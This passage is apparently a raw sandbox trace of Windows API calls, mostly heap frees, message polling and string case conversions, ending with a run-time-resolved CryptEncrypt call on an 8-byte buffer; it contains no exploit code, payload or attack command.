lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0157.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0157.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.136] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0157.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0157.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0157.136] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.136] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0157.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0157.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0157.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0157.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0157.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0157.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0157.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0157.163] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0157.163] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.163] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0157.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0157.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.163] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0157.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0157.163] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0157.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.164] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0157.164] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74088 | out: hHeap=0x2af0000) returned 1 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0157.164] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0157.164] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.164] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0157.164] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0157.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0157.165] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0157.165] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0157.165] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0157.165] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74160 | out: hHeap=0x2af0000) returned 1 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0157.165] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0157.165] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.165] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0157.166] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0157.166] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.166] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0157.166] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0157.166] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0157.166] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0157.166] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0157.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0157.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0157.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0157.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac60 | out: hHeap=0x2af0000) returned 1 [0157.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0157.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0157.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0157.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0157.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0157.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0157.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0157.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0157.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0157.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0157.168] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0157.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0157.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0157.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0157.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0157.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0157.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaac30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0157.169] CryptEncrypt (in: hKey=0x9e21f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0157.169] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.169] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.169] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.169] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.169] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0157.169] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.169] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.169] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0157.169] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.169] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0157.169] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.169] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.170] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0157.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaac48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0157.170] CryptEncrypt (in: hKey=0x9e21f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a728f8*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a728f8*, pdwDataLen=0x8cef60*=0x8) returned 1 [0157.170] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.170] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.170] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, 